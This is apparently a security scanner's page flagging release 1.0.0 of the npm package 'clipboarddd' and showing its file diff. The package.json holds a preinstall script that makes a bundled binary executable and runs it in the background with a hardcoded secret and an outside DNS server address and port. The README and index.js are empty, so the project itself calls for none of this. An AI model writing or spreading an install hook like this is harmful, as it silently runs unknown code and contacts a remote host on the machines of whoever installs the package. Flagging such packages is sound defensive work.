clipboarddd 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of clipboarddd might be problematic. Click here for more details.

package/README.txt ADDED
File without changes
package/bin/init ADDED
Binary file
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+
2
+ {
3
+ "name": "clipboarddd",
4
+ "version": "1.0.0",
5
+ "description": "",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "preinstall": "chmod +x bin/init&&bin/init --secret=root@123456 --dns server=100.69.249.146,port=10005 &",
9
+ "postinstall": "echo 2"
10
+ },
11
+ "keywords": [],
12
+ "author": "",
13
+ "license": "ISC"
14
+ }
15
+